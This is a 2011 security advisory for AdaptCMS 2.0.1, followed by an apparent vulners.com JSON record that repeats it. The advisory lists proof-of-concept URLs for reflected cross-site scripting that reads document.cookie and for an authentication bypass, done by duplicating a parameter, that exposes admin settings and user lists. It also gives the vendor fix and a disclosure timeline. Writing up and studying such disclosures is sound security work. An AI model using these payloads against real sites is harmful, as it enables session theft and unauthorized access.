Description
Advisory: AdaptCMS 2.0.1 Multiple security vulnerabilities
Advisory ID: SSCHADV2011-018
Author: Stefan Schurtz
Affected Software: Successfully tested on AdaptCMS 2.0.1
Vendor URL: http://www.adaptcms.com/
Vendor Status: fixed
CVE-ID: -
==========================
Vulnerability Description:
==========================
AdaptCMS 2.0.1 is prone to multiple security vulnerabilities
==================
Technical Details:
==================
Cross-site Scripting
http://<target>/AdaptCMS/admin.php?view=</script><script>alert(documentcookie)</script>
http://<target>/AdaptCMS/admin.php?view=share&do=</script><script>alert(document.cookie)</script>
http://<target>/AdaptCMS//?'</script><script>alert(document.cookie)</script>
http://<target>/AdaptCMS//index.php?'</script><script>alert(document.cookie)</script>
Authentication bypass / Information Disclosure
http://<target>/AdaptCMS/admin.php?view=/&view=settings
http://<target>/AdaptCMS/admin.php?view=/&view=users
http://<target>/AdaptCMS/admin.php?view=/&view=groups
http://<target>/AdaptCMS/admin.php?view=/&view=levels
http://<target>/AdaptCMS/admin.php?view=/&view=stats
=========
Solution:
=========
"Get the latest AdaptCMS Files" from the admin area
====================
Disclosure Timeline:
====================
24-Sep-2011 - informed developers
24-Sep-2011 - Release date of this security advisory
25-Sep-2011 - fixed by vendor
25-Sep-2011 - post on BugTraq
========
Credits:
========
Vulnerabilities found and advisory written by Stefan Schurtz.
===========
References:
===========
http://www.adaptcms.com/
http://www.insanevisions.com/article/293/News/AdaptCMS-201-Security-Hole
http://www.rul3z.de/advisories/SSCHADV2011-018.txt
{"id": "SECURITYVULNS:DOC:27066", "bulletinFamily": "software", "title": "AdaptCMS 2.0.1 Multiple security vulnerabilities", "description": "Advisory: AdaptCMS 2.0.1 Multiple security vulnerabilities\r\nAdvisory ID: \tSSCHADV2011-018\r\nAuthor: \tStefan Schurtz\r\nAffected Software: Successfully tested on AdaptCMS 2.0.1\r\nVendor URL: http://www.adaptcms.com/\r\nVendor Status: fixed\r\nCVE-ID: \t-\r\n\r\n==========================\r\nVulnerability Description:\r\n==========================\r\n\r\nAdaptCMS 2.0.1 is prone to multiple security vulnerabilities\r\n\r\n==================\r\nTechnical Details:\r\n==================\r\n\r\nCross-site Scripting\r\n\r\nhttp://<target>/AdaptCMS/admin.php?view=</script><script>alert(documentcookie)</script>\r\nhttp://<target>/AdaptCMS/admin.php?view=share&do=</script><script>alert(document.cookie)</script>\r\nhttp://<target>/AdaptCMS//?'</script><script>alert(document.cookie)</script>\r\nhttp://<target>/AdaptCMS//index.php?'</script><script>alert(document.cookie)</script>\r\n\r\nAuthentication bypass / Information Disclosure\r\n\r\nhttp://<target>/AdaptCMS/admin.php?view=/&view=settings\r\nhttp://<target>/AdaptCMS/admin.php?view=/&view=users\r\nhttp://<target>/AdaptCMS/admin.php?view=/&view=groups\r\nhttp://<target>/AdaptCMS/admin.php?view=/&view=levels\r\nhttp://<target>/AdaptCMS/admin.php?view=/&view=stats\r\n\r\n=========\r\nSolution:\r\n=========\r\n\r\n"Get the latest AdaptCMS Files" from the admin area\r\n\r\n====================\r\nDisclosure Timeline:\r\n====================\r\n\r\n24-Sep-2011 - informed developers\r\n24-Sep-2011 - Release date of this security advisory\r\n25-Sep-2011 - fixed by vendor\r\n25-Sep-2011 - post on BugTraq\r\n\r\n========\r\nCredits:\r\n========\r\n\r\nVulnerabilities found and advisory written by Stefan Schurtz.\r\n\r\n===========\r\nReferences:\r\n===========\r\n\r\nhttp://www.adaptcms.com/\r\nhttp://www.insanevisions.com/article/293/News/AdaptCMS-201-Security-Hole\r\nhttp://www.rul3z.de/advisories/SSCHADV2011-018.txt\r\n", "published": "2011-09-26T00:00:00", "modified": "2011-09-26T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27066", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:42", "edition": 1, "viewCount": 25, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11920"]}], "rev": 4}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645532354, "score": 1659803227}, "_internal": {"score_hash": "a4c599a046deae1d4f0ed1c54a2b01c3"}}
{}